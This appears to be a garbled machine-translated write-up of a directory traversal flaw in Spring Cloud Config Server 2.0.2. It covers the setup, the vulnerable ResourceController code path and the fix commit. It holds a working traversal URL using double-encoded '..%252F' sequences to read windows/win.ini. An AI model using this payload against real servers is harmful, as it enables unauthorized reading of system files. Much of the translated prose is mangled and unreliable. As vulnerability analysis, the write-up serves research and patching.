idea Joined in pom.xml
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-config-server</artifactId>
<version>2.0.2.RELEASE</version>
</dependency>
配置application.properties
server.port=8888
spring.cloud.config.server.git.uri=https://github.com/SukaraLin/awesome-cve-poc.git
After all
http://127.0.0.1:8888/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini
Spring Cloud Config Server is Spring, distributed expression management, client can pass http format 获tori placement 值. payload opposite routing existence in ʻorg.springframework.cloud.config.server.resource.ResourceController # retrieve () `in the middle of the generation
@RequestMapping({"/{name}/{profile}/{label}/**"})
public String retrieve(@PathVariable String name, @PathVariable String profile, @PathVariable String label, HttpServletRequest request, @RequestParam(defaultValue = "true") boolean resolvePlaceholders) throws IOException {
String path = this.getFilePath(request, name, profile, label);
return this.retrieve(name, profile, label, path, resolvePlaceholders);
}
{name} / {profile} / {label}
: name op. 结 库 name, profile op. During the actual measurement, name, profile, and label are required. Debug getFilePath
This 边 续 跟 retrieve (), 继 续 跟 retrieve (), this 边 path
FindOne, rank in ʻorg.springframework.cloud.config.server.resource.GenericResourceRepository # findOne`
Locations list file: / C: / Users / icu / AppData / Local / Temp / config-repo-6608031716294156148 /
Tori.
https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2
Special characters such as %
coming urldecode, matchmaking ../
, ..
,/
, etc.